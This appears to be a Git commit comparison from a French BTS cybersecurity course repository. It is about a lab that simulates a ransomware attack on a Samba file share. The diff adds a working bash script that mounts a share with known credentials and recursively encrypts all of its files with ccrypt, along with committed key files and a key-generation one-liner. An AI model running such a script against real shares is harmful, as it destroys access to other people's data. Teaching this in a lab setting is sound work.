Compare commits

...

4 Commits

Author SHA1 Message Date
Guillaume Emorine
8ac9bac7a1 Légère modification du script du ransomware. 2024-11-18 10:52:18 +01:00
Guillaume Emorine
bcff0b9ebc Modification des fichiers du TP sur la simulation du ransomware, et
ajout de deux clés: une de test, et la vraie clé.
2024-11-18 10:45:27 +01:00
cd8c794bc3 Actualiser bts_annee_2/ateliers_professionalisation/README.md 2024-11-14 15:44:47 +01:00
4fb288042e Actualiser bts_annee_2/README.md 2024-11-14 15:44:09 +01:00
6 changed files with 26 additions and 17 deletions

View File

@@ -1,2 +1,3 @@
Dépôt de seconde année de BTS.
Un répertoire est dédié au côté SISR, un autre est dédié au côté Cybersécurité.
Un dernier répertoire est dédié aux ateliers de professionalisation, mais les effectifs du BTS font que le seul présent (sur le SDIS 29) sera le dernier en mode "piscine".

View File

@@ -2,4 +2,4 @@
Ce dépôt contient les documents et scripts, fichiers de configuration et *playbooks* Ansible ayant étés élaborés lors de l'atelier de professionalisation 3, concernant le SDIS-29 comme sujet.
Le SDIS-29 est, si on vulgarise, les sapeurs-pompiers du Finistère.
** Chaque dossier porte un nom explicite, en rapport à ce qu'il contient.**
**Chaque dossier porte un nom explicite, en rapport à ce qu'il contient.**

View File

@@ -1,2 +1,3 @@
Dossier avec le script utilisé pour simuler une attaque de ransomware sur un partage Samba accessible en écriture, avec un mot de passe et nom d'utilisateur connus.
Les arguments passés après le nom du script sont utilisés plus tard et sont nécessaires.
Séance sur la simulation d'un *ransomware* sur un partage de fichiers Samba.
Le mode d'emploi du script est dans celui-ci.
Pour générer une clé d'encryption/décryption, on peut faire ceci: `date | sha512sum > macle.txt`.

View File

@@ -0,0 +1 @@
f1822d2fe58daeadc88e0e4eef2f155fc3edd3713ff9a5d1e27696afd9231d905db51c98dcf0c6416658239b8d3b5893c5775ffd7941f769a78fcd684c5f9161

View File

@@ -1,34 +1,39 @@
#!/bin/bash
# déclaration des variables
# Usage :
# bash smbcc.sh <chemin du partage Windows AVEC IP> <nom d'utilisateur/mot de passe> <action> <clé d'encryption>
# Déclaration des variables.
chemin=$1
cred=$2
action=$3
ficcle=$4
# récup du mot de passe et nom d'utilisateur
# Récupération du nom d'utilisateur et du mot de passe.
user=$(echo $cred| cut -d "/" -f1)
pass=$(echo $cred| cut -d "/" -f2)
# créa du répertoire et on monte dessus
[[ -e /mnt/samba ]] || mkdir /mnt/samba
mount.cifs -o "username=$user,password=$pass" "//${chemin}" /mnt/samba
# Création du répertoire s'il n'existe pas, et montage du partage Samba dessus.
[[ -e /tmp/samba ]] || mkdir /tmp/samba
mount.cifs -o "username=$user,password=$pass" "//${chemin}" /tmp/samba
# vérification d'erreurs
# Première vérification d'erreurs.
if [[ $? != 0 ]] ; then
rmdir /mnt/samba
rmdir /tmp/samba
exit 1
fi
# la commande ccrypt
ccrypt "$action" -r -k $ficcle /mnt/samba
# Commande ccrypt pour encrypter ou décrypter le répertoire avec le partage.
ccrypt "$action" -r -k $ficcle /tmp/samba
# vérification d'erreurs
# Seconde vérification d'erreurs.
if [[ $? != 0 ]] ; then
echo "ccrypt échoué, revérifie le script."
echo "Échec de ccrypt, veuillez relancer le script après avoir vérifié les paramètres."
umount /tmp/samba
exit 1
fi
# nettoyage et sortie, code 0
umount /mnt/samba
rmdir /mnt/samba
# Nettoyage des directoires, et sortie du script avec le code 0.
umount /tmp/samba
rmdir /tmp/samba
exit 0

View File

@@ -0,0 +1 @@
0d7b9fea61b5707ff8bf6da489a2638153e8c5d74d3bfab9a12dca6698da3ef61441cf86b819b166cae673efc97c99cb3ab8022c62774636f9e8fe18771a13db -